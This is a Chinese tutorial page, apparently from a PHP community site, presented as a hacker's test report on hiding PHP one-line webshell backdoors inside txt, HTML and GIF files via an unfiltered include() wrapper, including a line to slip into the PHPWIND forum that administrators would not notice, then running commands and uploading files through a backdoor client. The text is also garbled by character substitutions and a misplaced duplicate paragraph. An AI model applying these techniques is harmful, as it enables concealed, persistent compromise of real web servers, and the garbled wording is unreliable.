当前位置:  首页  >  PHP教程  >  PHP 安全  >  防注入

黑客经验谈Php后门的暗躲技巧测试报告

这里可能要和我们想象的成果有些差距了,实在命令已经运行了,只是返回的成果看不到而已,由于这是真正的GIF文件,所以是不会显示返回成果的,为了证实是否真的履行了命令我们履行上传文件命令。果不出所料,文件已经成功上传到服务器上。这样捏造的长处是隐躲性好。毛病也自然不用说了是没回显。假如你想看到返回的成果,那就拿出记事本

  最近很多朋友都在问我是否能把我那一句话木马暗躲到HTML或图片里,实在把一句话木马插进到PHP文件中就已经很隐躲了,假如说硬是要放到HTML文件或图片里,就接着往下看这篇的篇测试报告吧。要知道假如光把PHP语句放到图片里是无论如何也不能履行的,由于PHP只解析扩大名为php的文件。所以说要能使暗躲在图片里的PHP语句履行。我们就的借助PHP中的调用函数 :include 、require 等。

  我们还记得前些日子把木马暗躲到图片的文章吧。也就是在PHP文件里用include('x.gif')这样的语句来调用暗躲在图片的木马语句。ASP中语句也类似。看似非常隐躲但直接调用图片对稍微懂点PHP的人就不难发明可疑之处。由于URL 里用GET方法很难传递参数,这就使得插进木马的性能得不到施展。

  Include 函数在PHP中应用的比拟频繁,所以引起的安全标题也实在太多,例如PHPWIND1.36的漏洞就是由于include后面的变量没做过滤引起的。由此我们就可以结构类似的语句来插进到PHP文件中。然后把木马暗躲到图片或HTML文件里,可以说隐躲性就更高了。如在PHPWIND论坛里插进下面的语句:<‘’?@include includ/.$PHPWIND_ROOT;? > 一般治理员是无法看出来的。

  有了include 函数来帮助帮忙我们就可以把PHP木马暗躲到 诸如 txt、html和图片文件等很多类型的文件里来了。由于txt、html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了,下面我们就依次来做测试。

  首先建立一PHP文件test.php 文件内容为:   

   
  $test=$_GET['test'];

  @include 'test/'.$test;

  ?>   

  Txt文件一般都是阐明文件,所以我们把一句话木马放到目录的阐明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到t.txt文件里。然后拜访 http://localhost/test/test.php?test=../t.txt 假如你看到t.txt的内容就证实Ok了, 然后把在lanker微型PHP后门客户端 木马地址添进 http://localhost/test/test.php?test=../t.txt 密码里添进cmd就可以了,履行返回的成果都可以看到。   

  对于HTML的文件,一般都为模版文件。为了使插进到HTML的文件的木马能被调用履行而且不被显示出来,我们可以在HTML里参加一个暗躲属性的文本框 ,如: 然后应用方法同上。履行的返回成果一般都可以查看源文件看到。 如应用查看本程序目录功效。查看源文件内容为 我可以得到目录为 C:\Uniserver2_7s\www\test。

  下面我们说说图片文件,要说最为毒的一招莫过于把木马暗躲到图片里。我们可以直接对一个图片进行编纂,把插进到图片末尾  

  经测试一般都不会对图片造成影响。然后同样方法客户端木马地址添进 

 

我们查看PHP环境变量 返回的是成果是原图片。 

  这里可能要和我们想象的成果有些差距了,实在命令已经运行了,只是返回的成果看不到而已,由于这是真正的GIF文件,所以是不会显示返回成果的,为了证实是否真的履行了命令我们 履行上传文件命令。果不出所料,文件已经成功上传到服务器上。这样捏造的长处是隐躲性好。毛病也自然不用说了是没回显。假如你想看到返回的成果,那就拿出记事本捏造一个假的图片文件吧。

  到这里就基础测试完了,怎样隐躲PHP后门就看你自己的选择了。行文匆促,如有不妥之处,请指出!

吐了个 "CAO" !
扫码关注 PHP1 官方微信号
PHP1.CN | 中国最专业的PHP中文社区 | PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | PHP问答
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved PHP1.CN 第一PHP社区 版权所有